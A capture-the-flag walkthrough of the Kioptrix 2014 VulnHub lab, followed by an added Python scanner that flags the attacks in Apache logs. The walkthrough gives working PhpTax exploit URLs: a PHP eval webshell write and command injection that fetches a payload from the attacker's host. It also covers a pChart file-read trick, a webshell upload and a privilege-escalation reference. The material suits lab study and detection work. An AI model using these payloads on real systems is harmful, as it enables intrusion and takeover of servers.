Kioptrix: 2014 (#5)

Key points: user-agent, RCE, LFI

Target VM: https://www.vulnhub.com/entry/kioptrix-2014-5,62/

Environment setup #

| Name | IP |
| --- | --- |
| Kali Linux | 192.168.88.135 |
| KIOPTRIX: 2014 (#5) | 192.168.88.148 |

Initial reconnaissance #

Port scan #

```
$ export rip=192.168.88.148
$ sudo nmap -v -A -p- $rip
PORT     STATE  SERVICE VERSION
22/tcp   closed ssh
80/tcp   open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
|_http-server-header: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8
| http-methods: 
|_  Supported Methods: POST
8080/tcp open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
|_http-server-header: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8
|_http-title: 403 Forbidden
```

Web testing #

80 #

pChart2.1.3 #

Reference: Exploiting pChart 2.1.3 (Directory traversal & XSS)

Arbitrary file read

Read the Apache configuration

8080 #

Install a Firefox extension to set a custom User-Agent

Found phptax

Gaining access #

Approach 1 #

Reference: PhpTax 0.8 - File Manipulation 'newvalue' / Remote Code Execution

http://192.168.88.148:8080/phptax/index.php?field=123.php&newvalue=<?php eval($_REQUEST[123])?>

Approach 2 #

Reference: phptax 0.8 - Remote Code Execution

http://192.168.88.148:8080/phptax/index.php?pfilez=1040pg1.tob;%20ps%20-aux%3E/tmp/1;&pdf=make

Then use the pChart 2.1.3 arbitrary file read to view the command output.

An nc reverse shell attempt failed.

The nc on the box is a stripped-down build.

wget and curl both failed to run; downloading the file with fetch succeeded.

http://192.168.88.148:8080/phptax/index.php?pfilez=1040pg1.tob;%20%20fetch%20http://192.168.88.135/cmd.php%3E%20/tmp/1;&pdf=make
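As an added detection-side example (not part of the original write-up), the following Python scanner flags in Apache access logs the three request patterns used above: directory traversal in pChart parameters, shell metacharacters in phptax's pfilez, and PHP tags written through newvalue. The log lines, client IP and the pChart parameter name are constructed for this example; the two phptax requests mirror the URLs in the write-up.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed Apache access-log lines for this example (IP, timestamps and the
# pChart parameter name are made up; the phptax requests mirror the write-up).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:12:00:00 +0000] "GET /pChart2.1.3/index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:12:00:03 +0000] "GET /pChart2.1.3/examples/index.php?script=../../../../etc/passwd HTTP/1.1" 200 1400 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:12:00:09 +0000] "GET /phptax/index.php?pfilez=1040pg1.tob;%20ps%20-aux%3E/tmp/1;&pdf=make HTTP/1.1" 200 88 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:12:00:15 +0000] "GET /phptax/index.php?field=123.php&newvalue=%3C%3Fphp%20eval(%24_REQUEST%5B123%5D)%3F%3E HTTP/1.1" 200 88 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:12:00:20 +0000] "GET /phptax/index.php?pfilez=1040pg1.tob&pdf=make HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

# Combined log format: client ident user [time] "method target proto" status bytes "referer" "user-agent"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" \d{3} \S+ "[^"]*" "[^"]*"')
TRAVERSAL = re.compile(r"\.\.[/\\]")            # ../ or ..\ after percent-decoding
SHELL_META = re.compile(r"[;|`\n]|\$\(")         # command separators / substitution
PHP_TAG = re.compile(r"<\?(php|=)", re.IGNORECASE)

def parse_query(query):
    """Split on '&' only and percent-decode, so a raw ';' stays inside the value."""
    params = {}
    for pair in filter(None, query.split("&")):
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params

def classify(target):
    """Return the rule names that fire for one request target (path + query)."""
    url = urlsplit(target)
    params = parse_query(url.query)
    values = [v for vs in params.values() for v in vs]
    hits = []
    if any(TRAVERSAL.search(v) for v in values):
        hits.append("path-traversal")               # pChart-style arbitrary file read
    if "/phptax/" in url.path.lower():
        if any(SHELL_META.search(v) for v in params.get("pfilez", [])):
            hits.append("phptax-cmd-injection")     # shell metacharacters in pfilez
        if any(PHP_TAG.search(v) for v in params.get("newvalue", [])):
            hits.append("phptax-php-write")         # PHP tag written via newvalue
    return hits

def scan(log_text):
    """Return (line number, client IP, rule names) for each suspicious log line."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), 1):
        m = LOG_RE.match(line)
        if m and (hits := classify(m["target"])):
            findings.append((n, m["ip"], hits))
    return findings
```

Calling scan(SAMPLE_LOG) reports lines 2, 3 and 4; the legitimate phptax request on line 5 is not flagged.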

Privilege escalation #

Upload phpspy.php

Reverse shell

Reference: FreeBSD 9.0 < 9.1 - 'mmap/ptrace' Local Privilege Escalation